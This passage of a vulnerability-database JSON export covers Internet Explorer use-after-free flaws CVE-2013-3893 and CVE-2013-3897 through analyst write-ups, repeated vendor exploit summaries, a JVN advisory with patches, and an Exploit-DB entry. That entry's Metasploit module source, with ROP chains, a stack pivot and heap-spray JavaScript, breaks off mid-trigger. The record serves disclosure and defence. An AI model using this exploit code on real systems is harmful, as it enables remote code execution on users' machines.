"CVE-2013-1347", "CVE-2013-3893", "CVE-2013-3897"], "description": "Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help URL that triggers loading of hxds.dll.\n\n \n**Recent assessments:** \n \n**wchen-r7** at September 12, 2019 6:07pm UTC reported:\n\n# Information\n\n\u201cMS13-080 also fixes a second CVE vulnerability that has been exploited in limited attacks over the \nweb. This issue is a user-after-free vulnerability in CDisplayPointer triggered with \n\u201conpropertychange\u201d event handler. This exploit was found cached on a popular Javascript analysis \nwebsite and reported to us. The exploit code for this issue, released probably around mid-September \n, uses heap-spray to allocate a small ROP chain around address 0x14141414 and is designed to target \nonly IE8 running on Windows XP for Korean and Japanese language-based users\u201d \u2013 Microsoft\n\nThis issue is a use-after-free vulnerability in CDisplayPointer via the use of a \u201conpropertychange\u201d \nevent handler. To setup the appropriate buggy conditions, we first craft the DOM tree in a specific \norder, where a CBlockElement comes after the CTextArea element. There are also other ways to acheive \nthe same results, for example: Replace CBlockElement with another CTextArea. One possible explanation \nfor that is perhaps the second element needs to hold a reference of the parent.\n\nIf we use a select() function for the CTextArea element, two important things will happen: a \nCDisplayPointer object will be created for CTextArea, and it will also trigger another event called \n\u201conselect\u201d. The \u201conselect\u201d event will allow us to setup for the actual event handler we want to abuse\n\n * the \u201conpropertychange\u201d event. Since the CBlockElement is a child of CTextArea, if we do a node swap \nof CBlockElement in \u201conselect\u201d, this will trigger \u201conpropertychange\u201d. During \u201conpropertychange\u201d event \nhandling, a free of the CDisplayPointer object can be forced by using an \u201cUnslect\u201d (other approaches \nalso apply), but a reference of this freed memory will still be kept by CDoc::ScrollPointerIntoView, \nspecifically after the CDoc::GetLineInfo call, because it is still trying to use that to update \nCDisplayPointer\u2019s position. When this invalid reference arrives in QIClassID, a crash finally occurs \ndue to accessing the freed memory. By controlling this freed memory, it is possible to achieve arbitrary \ncode execution under the context of the user. \n\n\nThe trigger of the vulnerability seems to be based on previously discovered bugs, specifically \nCVE-2012-4969 (ie_execcommand_uaf) and CVE-2013-1347 (ie_cgenericelement_uaf). This just means \nthat the browser fuzzing tool was tweaked based on these references. There is some junk code in \nthe trigger. For example, contentEditable does not have to be enabled, but this attribute this \ncommonly enabled by fuzzers because of document selection. There is also multiple junk CollectGarbage \ncalls, with Math.atan2() debugging messages around them \u2013 which is also an indicator that the exploit \nauthor was still in the process of understanding what they\u2019re for. The vulnerability seems to only \nwork on Internet Explorer 8 (tested on Win 7 and Win XP), older versions might be affected, did not \ncheck. It does not work against IE9 (tested).\n\nThe exploit actually looks more like a proof-of-concept rather than weaponized. The Math.atan2() \nfunctions are used as a way to print debugging messages in WinDBG is a strong indicator that this poc \nwas possibly incomplete. It\u2019s possible that the experimental version was leaked on the web, so \nit was rushed into deployment.\n\nThe heap grooming technique is exactly the same as the CVE-2013-3893 \u2013 it\u2019d use the \nsetAttribute() function trigger heap allocations, creates 2000 of them, and the frees half of them. \nThis also indicates it\u2019s probably done by the same author.\n", "modified": "2020-10-14T00:00:00", "published": "2020-10-14T00:00:00", "id": "AKB:3C7B4CF8-80C4-45A5-9363-AFAA8C364D11", "href": "https://attackerkb.com/topics/KfWrR0dJNU/microsoft-internet-explorer-setmousecapture-use-after-free", "type": "attackerkb", "title": "Microsoft Internet Explorer SetMouseCapture Use-After-Free", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-15T18:45:45", "bulletinFamily": "info", "cvelist": ["CVE-2013-3893"], "description": "Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help. URL that triggers loading of hxds.dll.\n\n \n**Recent assessments:** \n \n**wchen-r7** at September 12, 2019 6:07pm UTC reported:\n\nExploit Hash: 203aa9b2439cfab4ff1678a227be9a9a\n\n# Information\n\nCVE-2013-3893 is a use-after-free vulnerability that affects Internet Explorer versions 6/7/8/9/10/11. \nIt was initially found being exploited in Japan. A fix-it workaround is already available at the time \nof the writing, no information on when Microsoft will release an official final to address the IE flaw.\n\nA sample of the exploit (in the wild) can be found on VirusTotal, scrumware.org, and jsunpack.\n\nThe exploit in the wild is written to target IE8/9, Win XP and Windows 7. Under Win XP, the code is \nspecifically tweaked to work against languages including English, Chinese, Japanese, Korean, although \nits fingerprinting code actually checks these languages: English, Chinese, French, German, Japanese, \nPortuguese, Korean, and Russian. It is safe to say it\u2019s designed to work against Windows machines in \nAsia, hard to why other languages are fingerprinted but not tweaked. Either because the author was \nlazy to test them, and the fingerprinting code was a lazy copy-and paste. Or, they can be exploited \nsuccessfully without any tweaks. Under Windows 7, Office 2007 is also required to engauge the target, \nhowever the fingerprinting code also checks Office 2010, which seems rather unnecessary. The exploit \nwill attempt again and again until either the browser crashes, or indefinitely. After exploitation, \nthe exploit will set a cookie on the victim machine as a way to avoid hitting the same target again.\n\nThe vulnerability is due to how the mshtml!CDoc::SetMouseCapture function handles a reference during \nan event. An attacker first can setup two elements, where the second is the child of the first, and \nthen setup a onlosecapture event handler for the parent element. The onlosecapture event seems to \nrequire two setCapture() calls to trigger, one for the parent element, one for the child. When the \nsetCapture() call for the child element is called, it finally triggers the event, which allows the \nattacker to cause an arbitrary memory release using document.write(), which in particular frees up \na 0x54-byte memory. The exact size of this memory may differ based on the version of IE. After the \nfree, an invalid reference will still be kept and pass on to more functions, eventuall this arrives \nin function MSHTML!CTreeNode::GetInterface, and causes a crash (or arbitrary code execution) when \nthis function attempts to use this reference to call what appears to be a PrivateQueryInterface due \nto the offset (0x00).\n", "modified": "2020-09-02T00:00:00", "published": "2013-09-18T00:00:00", "id": "AKB:38B15624-980B-45E2-BDE4-EE54BFBA9846", "href": "https://attackerkb.com/topics/pXKdBDoCZw/microsoft-internet-explorer-setmousecapture-use-after-free", "type": "attackerkb", "title": "Microsoft Internet Explorer SetMouseCapture Use-After-Free", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2019-05-29T19:19:29", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-3893"], "edition": 2, "description": "Added: 09/25/2013 \nCVE: [CVE-2013-3893](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3893>) \nBID: [62453](<http://www.securityfocus.com/bid/62453>) \nOSVDB: [97380](<http://www.osvdb.org/97380>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nMicrosoft Internet Explorer 6 through 11 contain a use-after-free vulnerability in the SetMouseCapture implementation in the HTML rendering engine (`**mshtml.dll**`). The vulnerability is triggered by the OnLoseCapture event. A remote attacker that persuades a user to open a specially crafted web page in a vulnerable version of IE could dereference already freed memory and execute arbitrary code via crafted JavaScript strings. \n\n### Resolution\n\nSee [Microsoft Security Advisory 2887505](<http://technet.microsoft.com/en-us/security/advisory/2887505>). \n\n### References\n\n<http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx> \n<http://secunia.com/advisories/54884/> \n\n\n### Limitations\n\nExploit works on Microsoft Internet Explorer 8 and 9 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). JRE 6 must be installed on Windows 7. \n\nThe user must open the exploit in a vulnerable version of Internet Explorer. The chance of successful exploitation is very low against Internet Explorer 8 on Windows 7. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2013-09-25T00:00:00", "published": "2013-09-25T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/ie_onlosecapture_event_uaf", "id": "SAINT:A85CFBC6927213488530ECDD18E63DF7", "type": "saint", "title": "Internet Explorer HTML Rendering Engine onLoseCapture Use-After-Free Vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-04T23:19:41", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-3893"], "description": "Added: 09/25/2013 \nCVE: [CVE-2013-3893](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3893>) \nBID: [62453](<http://www.securityfocus.com/bid/62453>) \nOSVDB: [97380](<http://www.osvdb.org/97380>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nMicrosoft Internet Explorer 6 through 11 contain a use-after-free vulnerability in the SetMouseCapture implementation in the HTML rendering engine (`**mshtml.dll**`). The vulnerability is triggered by the OnLoseCapture event. A remote attacker that persuades a user to open a specially crafted web page in a vulnerable version of IE could dereference already freed memory and execute arbitrary code via crafted JavaScript strings. \n\n### Resolution\n\nSee [Microsoft Security Advisory 2887505](<http://technet.microsoft.com/en-us/security/advisory/2887505>). \n\n### References\n\n<http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx> \n<http://secunia.com/advisories/54884/> \n\n\n### Limitations\n\nExploit works on Microsoft Internet Explorer 8 and 9 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). JRE 6 must be installed on Windows 7. \n\nThe user must open the exploit in a vulnerable version of Internet Explorer. The chance of successful exploitation is very low against Internet Explorer 8 on Windows 7. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2013-09-25T00:00:00", "published": "2013-09-25T00:00:00", "id": "SAINT:AA6CF686B616406A4115C9EBD9C6048C", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ie_onlosecapture_event_uaf", "title": "Internet Explorer HTML Rendering Engine onLoseCapture Use-After-Free Vulnerability", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:54", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-3893"], "description": "Added: 09/25/2013 \nCVE: [CVE-2013-3893](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3893>) \nBID: [62453](<http://www.securityfocus.com/bid/62453>) \nOSVDB: [97380](<http://www.osvdb.org/97380>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nMicrosoft Internet Explorer 6 through 11 contain a use-after-free vulnerability in the SetMouseCapture implementation in the HTML rendering engine (`**mshtml.dll**`). The vulnerability is triggered by the OnLoseCapture event. A remote attacker that persuades a user to open a specially crafted web page in a vulnerable version of IE could dereference already freed memory and execute arbitrary code via crafted JavaScript strings. \n\n### Resolution\n\nSee [Microsoft Security Advisory 2887505](<http://technet.microsoft.com/en-us/security/advisory/2887505>). \n\n### References\n\n<http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx> \n<http://secunia.com/advisories/54884/> \n\n\n### Limitations\n\nExploit works on Microsoft Internet Explorer 8 and 9 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). JRE 6 must be installed on Windows 7. \n\nThe user must open the exploit in a vulnerable version of Internet Explorer. The chance of successful exploitation is very low against Internet Explorer 8 on Windows 7. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2013-09-25T00:00:00", "published": "2013-09-25T00:00:00", "id": "SAINT:04BD9122E7584A49B7BA167BCE00F13E", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/ie_onlosecapture_event_uaf", "type": "saint", "title": "Internet Explorer HTML Rendering Engine onLoseCapture Use-After-Free Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T19:19:28", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-3897"], "edition": 2, "description": "Added: 10/10/2013 \nCVE: [CVE-2013-3897](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3897>) \nBID: [62811](<http://www.securityfocus.com/bid/62811>) \nOSVDB: [98207](<http://www.osvdb.org/98207>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nMicrosoft Internet Explorer contains a use-after-free error when processing `**CDisplayPointer**` objects contained in `**mshtml.dll**`. The use-after-free memory corruption can be triggered by the `**onpropertychange**` event. A remote attacker who persuades a user to open a specially crafted web page in a vulnerable version of Internet Explorer could execute arbitrary code in the context of the current user. \n\n### Resolution\n\nApply the [KB2879017](<https://support.microsoft.com/kb/2879017>) update for Internet Explorer. \n\n### References\n\n<http://technet.microsoft.com/en-us/security/bulletin/MS13-080> \n<http://vrt-blog.snort.org/2013/10/ie-zero-day-cve-2013-3897-youve-been.html> \n\n\n### Limitations\n\nExploit works on Microsoft Internet Explorer 8 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\nJRE 6 must be installed on Windows 7. \n\nThe user must open the exploit in Internet Explorer 8. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2013-10-10T00:00:00", "published": "2013-10-10T00:00:00", "id": "SAINT:9C9DF567B343B95BFBDBFC93C3D86956", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/ie_cdisplaypointer_onpropertychange_uaf", "type": "saint", "title": "Internet Explorer CDisplayPointer Object onpropertychange Use-After-Free", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:57", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-3897"], "description": "Added: 10/10/2013 \nCVE: [CVE-2013-3897](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3897>) \nBID: [62811](<http://www.securityfocus.com/bid/62811>) \nOSVDB: [98207](<http://www.osvdb.org/98207>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nMicrosoft Internet Explorer contains a use-after-free error when processing `**CDisplayPointer**` objects contained in `**mshtml.dll**`. The use-after-free memory corruption can be triggered by the `**onpropertychange**` event. A remote attacker who persuades a user to open a specially crafted web page in a vulnerable version of Internet Explorer could execute arbitrary code in the context of the current user. \n\n### Resolution\n\nApply the [KB2879017](<https://support.microsoft.com/kb/2879017>) update for Internet Explorer. \n\n### References\n\n<http://technet.microsoft.com/en-us/security/bulletin/MS13-080> \n<http://vrt-blog.snort.org/2013/10/ie-zero-day-cve-2013-3897-youve-been.html> \n\n\n### Limitations\n\nExploit works on Microsoft Internet Explorer 8 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\nJRE 6 must be installed on Windows 7. \n\nThe user must open the exploit in Internet Explorer 8. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2013-10-10T00:00:00", "published": "2013-10-10T00:00:00", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/ie_cdisplaypointer_onpropertychange_uaf", "id": "SAINT:565085A4E9D605FF42D2E3C8CE2A1451", "type": "saint", "title": "Internet Explorer CDisplayPointer Object onpropertychange Use-After-Free", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:37", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-3897"], "description": "Added: 10/10/2013 \nCVE: [CVE-2013-3897](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3897>) \nBID: [62811](<http://www.securityfocus.com/bid/62811>) \nOSVDB: [98207](<http://www.osvdb.org/98207>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nMicrosoft Internet Explorer contains a use-after-free error when processing `**CDisplayPointer**` objects contained in `**mshtml.dll**`. The use-after-free memory corruption can be triggered by the `**onpropertychange**` event. A remote attacker who persuades a user to open a specially crafted web page in a vulnerable version of Internet Explorer could execute arbitrary code in the context of the current user. \n\n### Resolution\n\nApply the [KB2879017](<https://support.microsoft.com/kb/2879017>) update for Internet Explorer. \n\n### References\n\n<http://technet.microsoft.com/en-us/security/bulletin/MS13-080> \n<http://vrt-blog.snort.org/2013/10/ie-zero-day-cve-2013-3897-youve-been.html> \n\n\n### Limitations\n\nExploit works on Microsoft Internet Explorer 8 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\nJRE 6 must be installed on Windows 7. \n\nThe user must open the exploit in Internet Explorer 8. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2013-10-10T00:00:00", "published": "2013-10-10T00:00:00", "id": "SAINT:05AC159DEDA55280FEAA1BA681193C19", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ie_cdisplaypointer_onpropertychange_uaf", "title": "Internet Explorer CDisplayPointer Object onpropertychange Use-After-Free", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "jvn": [{"lastseen": "2019-05-29T17:21:43", "bulletinFamily": "info", "cvelist": ["CVE-2013-3893"], "description": "\n ## Description\n\nInternet Explorer contains a vulnerability that may allow arbitrary code execution. \n \nAccording to Microsoft, targeted attacks that attempt to exploit this vulnerability have been confirmed but are limited. \n\n\n ## Impact\n\nIf a user views a specially crafted web page, an arbitrary code may be executed. \n\n\n ## Solution\n\n**Apply an update** \nApply [Cumulative Security Update for Internet Explorer (2879017)](<http://technet.microsoft.com/en-us/security/bulletin/ms13-080>) according to the information provided by Microsoft. \n \n**Apply a workaround \n**The following workarounds may mitigate the affects of this vulnerability. \n\n\n * Apply [Fix it 51001](<https://support.microsoft.com/kb/2887505>)\n * Apply [Enhanced Mitigation Experience Toolkit (EMET)](<https://support.microsoft.com/kb/2458544/en>)\n * Restrict the execution of ActiveX control and Active Script\nFor more information, please see \"[Suggested Actions](<http://technet.microsoft.com/en-us/security/advisory/2887505#section6>)\" of Microsoft Security Advisory (2887505). \n\n\n ## Products Affected\n\n * Microsoft Internet Explorer 6.0\n * Windows Internet Explorer 7\n * Windows Internet Explorer 8\n * Windows Internet Explorer 9\n * Internet Explorer 10 \n * Internet Explorer 11\n", "edition": 4, "modified": "2013-10-17T00:00:00", "published": "2013-09-19T00:00:00", "id": "JVN:27443259", "href": "http://jvn.jp/en/jp/JVN27443259/index.html", "title": "JVN#27443259: Internet Explorer vulnerable to arbitrary code execution", "type": "jvn", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-03T08:41:42", "description": "Micorosft Internet Explorer SetMouseCapture Use-After-Free. CVE-2013-3893. Remote exploit for windows platform", "published": "2013-10-02T00:00:00", "type": "exploitdb", "title": "Micorosft Internet Explorer SetMouseCapture Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-3893"], "modified": "2013-10-02T00:00:00", "id": "EDB-ID:28682", "href": "https://www.exploit-db.com/exploits/28682/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Micorosft Internet Explorer SetMouseCapture Use-After-Free\",\r\n 'Description' => %q{\r\n This module exploits a use-after-free vulnerability that currents targets Internet\r\n Explorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11.\r\n It was initially found in the wild in Japan, but other regions such as English,\r\n Chinese, Korean, etc, were targeted as well.\r\n\r\n The vulnerability is due to how the mshtml!CDoc::SetMouseCapture function handles a\r\n reference during an event. An attacker first can setup two elements, where the second\r\n is the child of the first, and then setup a onlosecapture event handler for the parent\r\n element. The onlosecapture event seems to require two setCapture() calls to trigger,\r\n one for the parent element, one for the child. When the setCapture() call for the child\r\n element is called, it finally triggers the event, which allows the attacker to cause an\r\n arbitrary memory release using document.write(), which in particular frees up a 0x54-byte\r\n memory. The exact size of this memory may differ based on the version of IE. After the\r\n free, an invalid reference will still be kept and pass on to more functions, eventuall\r\n this arrives in function MSHTML!CTreeNode::GetInterface, and causes a crash (or arbitrary\r\n code execution) when this function attempts to use this reference to call what appears to\r\n be a PrivateQueryInterface due to the offset (0x00).\r\n\r\n To mimic the same exploit found in the wild, this module will try to use the same DLL\r\n from Microsoft Office 2007 or 2010 to leverage the attack.\r\n\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Unknown', # Exploit in the wild first spotted in Japan\r\n 'sinn3r' # Metasploit (thx binjo for the heads up!)\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-3893' ],\r\n [ 'OSVDB', '97380' ],\r\n [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2887505' ],\r\n [ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx' ]\r\n ],\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ],\r\n [ 'IE 9 on Windows 7 SP1 with Microsoft Office 2007 or 2010', {} ]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x00\",\r\n 'PrependEncoder' => \"\\x81\\xc4\\x80\\xc7\\xfe\\xff\" # add esp, -80000\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'PrependMigrate' => true,\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Sep 17 2013\",\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def is_win7_ie9?(agent)\r\n (agent =~ /MSIE 9/ and agent =~ /Windows NT 6\\.1/)\r\n end\r\n\r\n def get_preq_html(cli, req)\r\n %Q|\r\n<html>\r\n<script>\r\n function getDLL() {\r\n var checka = 0;\r\n var checkb = 0;\r\n\r\n try {\r\n checka = new ActiveXObject(\"SharePoint.OpenDocuments.4\");\r\n } catch (e) {}\r\n\r\n try {\r\n checkb = new ActiveXObject(\"SharePoint.OpenDocuments.3\");\r\n } catch (e) {}\r\n\r\n if ((typeof checka) == \"object\" && (typeof checkb) == \"object\") {\r\n return \"office2010\";\r\n }\r\n else if ((typeof checka) == \"number\" && (typeof checkb) == \"object\") {\r\n return \"office2007\";\r\n }\r\n\r\n return \"na\";\r\n }\r\n\r\n window.onload = function() {\r\n document.location = \"#{get_resource}/#{@exploit_page}?dll=\" + getDLL();\r\n }\r\n</script>\r\n</html>\r\n |\r\n end\r\n\r\n def junk\r\n return rand_text_alpha(4).unpack(\"V\")[0].to_i\r\n end\r\n\r\n def get_payload(rop_dll)\r\n code = payload.encoded\r\n rop = ''\r\n p = ''\r\n\r\n case rop_dll\r\n when :office2007\r\n rop = \r\n [\r\n junk, # Alignment\r\n 0x51c46f91, # POP EBP # RETN [hxds.dll] \r\n 0x51c46f91, # skip 4 bytes [hxds.dll]\r\n 0x51c35a4d, # POP EBX # RETN [hxds.dll] \r\n 0xffffffff,\r\n 0x51bd90fd, # INC EBX # RETN [hxds.dll]\r\n 0x51bd90fd, # INC EBX # RETN [hxds.dll]\r\n 0x51bfa98e, # POP EDX # RETN [hxds.dll] \r\n 0xffffefff,\r\n 0x51c08b65, # XCHG EAX, EDX # RETN [hxds.dll]\r\n 0x51c1df88, # NEG EAX # RETN [hxds.dll]\r\n 0x51c55c45, # DEC EAX, RETN [hxds.dll]\r\n 0x51c08b65, # XCHG EAX, EDX # RETN [hxds.dll]\r\n 0x51c4c17c, # POP ECX # RETN [hxds.dll]\r\n 0xffffffc0,\r\n 0x51bfbaae, # XCHG EAX, ECX # RETN [hxds.dll]\r\n 0x51c1df88, # NEG EAX # RETN [hxds.dll]\r\n 0x51bfbaae, # XCHG EAX, ECX # RETN [hxds.dll]\r\n 0x51c05766, # POP EDI # RETN [hxds.dll] \r\n 0x51bfbaaf, # RETN (ROP NOP) [hxds.dll]\r\n 0x51c2e77d, # POP ESI # RETN [hxds.dll] \r\n 0x51bfc840, # JMP [EAX] [hxds.dll]\r\n 0x51c05266, # POP EAX # RETN [hxds.dll] \r\n 0x51bd115c, # ptr to &VirtualAlloc() [IAT hxds.dll]\r\n 0x51bdf91f, # PUSHAD # RETN [hxds.dll] \r\n 0x51c4a9f3, # ptr to 'jmp esp' [hxds.dll]\r\n ].pack(\"V*\")\r\n\r\n when :office2010\r\n rop = \r\n [\r\n # 4 dword junks due to the add esp in stack pivot\r\n junk,\r\n junk,\r\n junk,\r\n junk,\r\n 0x51c41953, # POP EBP # RETN [hxds.dll]\r\n 0x51be3a03, # RETN (ROP NOP) [hxds.dll]\r\n 0x51c41953, # skip 4 bytes [hxds.dll]\r\n 0x51c4486d, # POP EBX # RETN [hxds.dll] \r\n 0xffffffff,\r\n 0x51c392d8, # EXCHG EAX, EBX # RETN [hxds.dll]\r\n 0x51bd1a77, # INC EAX # RETN [hxds.dll]\r\n 0x51bd1a77, # INC EAX # RETN [hxds.dll]\r\n 0x51c392d8, # EXCHG EAX, EBX # RETN [hxds.dll]\r\n 0x51bfa298, # POP EDX # RETN [hxds.dll] \r\n 0xffffefff,\r\n 0x51bea84d, # XCHG EAX, EDX # RETN [hxds.dll]\r\n 0x51bf5188, # NEG EAX # POP ESI # RETN [hxds.dll]\r\n junk,\r\n 0x51bd5382, # DEC EAX # RETN [hxds.dll]\r\n 0x51bea84d, # XCHG EAX, EDX # RETN [hxds.dll]\r\n 0x51c1f094, # POP ECX # RETN [hxds.dll] \r\n 0xffffffc0,\r\n 0x51be5986, # XCHG EAX, ECX # RETN [hxds.dll]\r\n 0x51bf5188, # NEG EAX # POP ESI # RETN [hxds.dll]\r\n junk,\r\n 0x51be5986, # XCHG EAX, ECX # RETN [hxds.dll]\r\n 0x51bf1ff0, # POP EDI # RETN [hxds.dll] \r\n 0x51bd5383, # RETN (ROP NOP) [hxds.dll]\r\n 0x51c07c8b, # POP ESI # RETN [hxds.dll] \r\n 0x51bfc7cb, # JMP [EAX] [hxds.dll]\r\n 0x51c44707, # POP EAX # RETN [hxds.dll] \r\n 0x51bd10bc, # ptr to &VirtualAlloc() [IAT hxds.dll]\r\n 0x51c3604e, # PUSHAD # RETN [hxds.dll] \r\n 0x51c541ef, # ptr to 'jmp esp' [hxds.dll]\r\n ].pack(\"V*\")\r\n end\r\n\r\n p = rop + code\r\n p\r\n end\r\n\r\n def get_exploit_html(cli, req, rop_dll)\r\n gadgets = {}\r\n case rop_dll\r\n when :office2007\r\n gadgets[:spray1] = 0x1af40020\r\n\r\n # 0x31610020-0xc4, pointer to gadgets[:call_eax]\r\n gadgets[:target] = 0x3160ff5c\r\n\r\n # mov eax, [esi]\r\n # push esi\r\n # call [eax+4]\r\n gadgets[:call_eax] = 0x51bd1ce8\r\n\r\n # xchg eax,esp\r\n # add byte [eax], al\r\n # pop esi\r\n # mov [edi+23c], ebp\r\n # mov [edi+238], ebp\r\n # mov [edi+234], ebp\r\n # pop ebp\r\n # pop ebx\r\n # ret\r\n gadgets[:pivot] = 0x51be4418\r\n\r\n when :office2010\r\n gadgets[:spray1] = 0x1a7f0020\r\n\r\n # 0x30200020-0xc4, pointer to gadgets[:call_eax]\r\n gadgets[:target] = 0x301fff5c\r\n\r\n # mov eax, [esi]\r\n # push esi\r\n # call [eax+4]\r\n gadgets[:call_eax] = 0x51bd1a41\r\n\r\n # xchg eax,esp\r\n # add eax,dword ptr [eax]\r\n # add esp,10\r\n # mov eax,esi\r\n # pop esi\r\n # pop ebp # retn 4\r\n gadgets[:pivot] = 0x51c00e64\r\n end\r\n\r\n p1 =\r\n [\r\n gadgets[:target], # Target address\r\n gadgets[:pivot] # stack pivot\r\n ].pack(\"V*\")\r\n\r\n p1 << get_payload(rop_dll)\r\n\r\n p2 =\r\n [\r\n gadgets[:call_eax] # MSHTML!CTreeNode::NodeAddRef+0x48 (call eax)\r\n ].pack(\"V*\")\r\n\r\n js_s1 = Rex::Text::to_unescape([gadgets[:spray1]].pack(\"V*\"))\r\n js_p1 = Rex::Text.to_unescape(p1)\r\n js_p2 = Rex::Text.to_unescape(p2)\r\n\r\n %Q|\r\n<html>\r\n<script>\r\n#{js_property_spray}\r\n\r\nfunction loadOffice() {\r\n try{location.href='ms-help://'} catch(e){}\r\n}\r\n\r\nvar a = new Array();\r\nfunction spray() {\r\n var obj = '';\r\n for (i=0; i<20; i++) {\r\n if (i==0) { obj += unescape(\"#{js_s1}\"); }\r\n else { obj += \"\\\\u4242\\\\u4242\"; }\r\n }\r\n obj += \"\\\\u5555\";\r\n\r\n for (i=0; i<10; i++) {\r\n var e = document.createElement(\"div\");\r\n e.className = obj;\r\n a.push(e);\r\n }\r\n\r\n var s1 = unescape(\"#{js_p1}\");\r\n sprayHeap({shellcode:s1, maxAllocs:0x300});\r\n var s2 = unescape(\"#{js_p2}\");\r\n sprayHeap({shellcode:s2, maxAllocs:0x300});\r\n}\r\n\r\nfunction hit()\r\n{\r\n var id_0 = document.createElement(\"sup\");\r\n var id_1 = document.createElement(\"audio\");\r\n\r\n document.body.appendChild(id_0);\r\n document.body.appendChild(id_1);\r\n id_1.applyElement(id_0);\r\n\r\n 